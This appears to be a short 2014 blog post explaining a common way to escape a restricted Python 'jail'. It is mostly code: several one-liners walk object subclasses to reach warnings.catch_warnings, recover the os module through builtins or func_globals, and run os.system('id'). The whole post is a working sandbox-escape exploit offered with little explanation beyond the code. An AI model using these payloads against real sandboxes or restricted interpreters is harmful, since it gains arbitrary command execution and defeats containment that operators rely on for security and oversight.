Thursday, December 11, 2014

Python jailbreak

This is a very common method to escape from a python jail.

The key idea is obtaining the <warnings.catch_warnings> class

# try to get <class 'warnings.catch_warnings'>
for i, j in enumerate({}.__class__.__base__.__subclasses__()):
    print(i, j)

# or another alternative way
print([c for c in {}.__class__.__base__.__subclasses__()  if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os'))

# The 59 here is warnings.catch_warnings
w = ().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

w = [].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

w = {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

w = ().__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")

w = [].__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")

w = {}.__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")


# all of the aboves are equivalent to
import os
os.system("id")



No comments:

Post a Comment